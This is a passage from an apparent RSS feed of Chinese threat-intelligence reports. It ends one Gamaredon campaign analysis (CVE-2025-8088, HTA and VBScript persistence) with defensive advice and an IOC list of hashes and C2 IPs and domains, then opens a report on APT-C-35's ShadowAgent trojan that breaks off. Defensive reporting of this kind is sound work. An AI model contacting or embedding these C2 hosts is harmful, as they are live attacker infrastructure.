18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 三、归属研判 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">本次攻击活动是Gamaredon组织的一次典型行动。该组织通过将新的CVE-2025-8088漏洞（用于初始访问和第一层持久化）与其成熟的、以VBScript为核心的攻击框架（用于载荷投递和多层持久化）相结合，构建了高效且具备弹性的入侵和持久化路径。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">从利用漏洞写入HTA下载器，到执行多层混淆的VBScript，再到利用计划任务实现第二层持久化，攻击链的每一步都清晰地体现了该组织鲜明的攻击特征。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 四、</span><span leaf="">防范排查建议</span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf=""><span textstyle="" style="font-weight: bold;">强化邮件安全防护：</span>部署先进的邮件网关解决方案，过滤和拦截恶意附件和钓鱼邮件，特别是含有LNK文件和恶意压缩文件的邮件。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf=""><span textstyle="" style="font-weight: bold;">加强系统和网络监控：</span>实施全面的日志监控和分析，重点关注系统启动项、注册表修改以及PowerShell脚本的执行记录。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf=""><span textstyle="" style="font-weight: bold;">强化终端安全防护：</span>安装360安全卫士，并确保所有终端设备安装并定期更新反病毒和反恶意软件，进行全面的恶意软件扫描</span></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer"><div data-role="paragraph" data-pm-slice="3 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">附录 IOC</span></span></strong></span></p></div></div><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;"><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">MD5</span></span></strong></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">0e39dee073166e011bc0f425caf9446e</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="2 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;data-pm-slice&#34;:&#34;3 6 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-role\&#34;:\&#34;outer\&#34;,\&#34;label\&#34;:\&#34;edit by 135editor\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-role\&#34;:\&#34;outer\&#34;,\&#34;label\&#34;:\&#34;Powered by 135editor.com\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-role\&#34;:\&#34;outer\&#34;,\&#34;label\&#34;:\&#34;Powered by 135editor.com\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-role\&#34;:\&#34;outer\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px; margin-bottom: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 8px; line-height: 1.6em; margin-top: 8px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="">ae1e647eece735f631addb0731d3580b</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="color: rgb(0, 0, 0);font-size: 15px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;"><span leaf=""><span textstyle="" style="font-weight: bold;">C2</span></span></span></span></span></p></div></div></div></div></div></div></div><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">62.60.234.123</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">87.251.69.182</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">open-files.sytes[.]net</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">digitall.webhop[.]me</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">228w1mx7-80.usw3.devtunnels[.]ms</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">488c65e6d7175f5e696ece9711c0ec37.loophole[.]site</span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span leaf="" style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">books-drunk-typical-indirect.trycloudflare[.]com</span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="6 7 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="98507" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><div style="margin: 10px auto;text-align: center;line-height: 1.5em;"><div style="padding-bottom: 3px;display: flex;justify-content: center;align-items: center;border-bottom: 1px solid rgb(190, 25, 31);"><p data-brushtype="text" style="padding-right: 8px;padding-left: 8px;font-size: 16px;letter-spacing: 1.5px;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">团队介绍</span></strong></span></p></div></div><p style="padding-top: 4px;padding-bottom: 4px;font-size: 12px;letter-spacing: 1.5px;line-height: 1.5em;text-align: center;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">TEAM INTRODUCTION</span></span></p></div><div data-role="paragraph" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(190, 25, 31);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">360</span></span></strong><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">高级威胁研究院</span></span></strong></span></p><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(136, 136, 136);font-size: 14px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">360高级威胁研究院是360政企安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="2247507617">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=82dc76cd&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247507617%26idx%3D1%26sn%3D9a64ed18ff9ef62dc3e66b76b1ac6a8b">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 05 Dec 2025 17:30:00 +0800</pubDate>
    </item>
    <item>
      <title>APT-C-35（肚脑虫）近期针对巴基斯坦新型木马攻击活动分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507603&amp;idx=1&amp;sn=af41be456f6393a24771846328e8d7f2</link>
      <description>近期360安全大脑监测到肚脑虫组织针对巴基斯坦的攻击活动，此次活动中使用新型的远控木马--ShadowAgent,该木马对进程图标进行伪装，诱使用户点击，使用WebSocket+HTTP与服务器进行通信。</description>
      <content:encoded><![CDATA[<p>
原创 <span>高级威胁研究院</span> <span>2025-11-28 17:30</span> <span style="display: inline-block;">北京</span>
</p>




<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=b7b56319&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczic0t37atwR8nKLP6ORwEfe8NksKEjLzIic8XcF1DcT7MrHa1nwC3PqpkA%2F0%3Fwx_fmt%3Djpeg"/></p>

<p>近期360安全大脑监测到肚脑虫组织针对巴基斯坦的攻击活动，此次活动中使用新型的远控木马--ShadowAgent,该木马对进程图标进行伪装，诱使用户点击，使用WebSocket+HTTP与服务器进行通信。</p>

<div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="102539"><div style="margin: 10px auto;text-align: left;"><div style="background: #f2f2f2;"><div style="padding: 1em;" data-pm-slice="7 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-tools&#34;:&#34;135编辑器&#34;,&#34;data-id&#34;:&#34;102539&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin: 10px auto;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background: #f2f2f2;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="display: flex;justify-content:  space-between;align-items: flex-end;" hm_fix="312:231"><div style="display: flex;justify-content: space-between;flex-direction: column;align-items: flex-start;border-left: 4px solid rgb(190, 25, 31);"><p data-brushtype="text" style="font-size: 16px;letter-spacing: 1.5px;padding-right: 0em;padding-bottom: 3px;padding-left: 0em;color: rgb(50, 40, 40);margin-left: 12px;border-bottom: 1px solid rgb(190, 25, 31);font-style: italic;"><span style="font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">APT-C-35</span></strong></span></p><p data-brushtype="text" style="letter-spacing: 1.5px;padding-top: 4px;padding-right: 0em;padding-left: 0em;color: rgb(190, 25, 31);font-style: italic;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 18px;"><strong><span leaf="">肚脑虫</span></strong></span></span></p></div></div><div data-autoskip="1" style="text-align: justify;line-height:1.75em;letter-spacing: 1.5px;font-size:14px;color:#000;margin-top: 20px;"><p style="text-align: justify;vertical-align: inherit;color: rgb(51, 51, 51);text-indent: 28px;font-family: 等线;margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="line-height: 18.4px;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);"><span leaf="">APT-C-35（肚脑虫）组织（又称Donot）是一个来自南亚地区的境外APT攻击组织。该组织主要针对巴基斯坦及周边国家的政府机构开展网络攻击活动,以窃取敏感信息为主要目标，攻击活动最早可追溯到2016年，近年来其活动频率明显增加，使用的攻击组件也不断更新迭代。</span></span></span></p></div></div></div></div></div></div></div><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 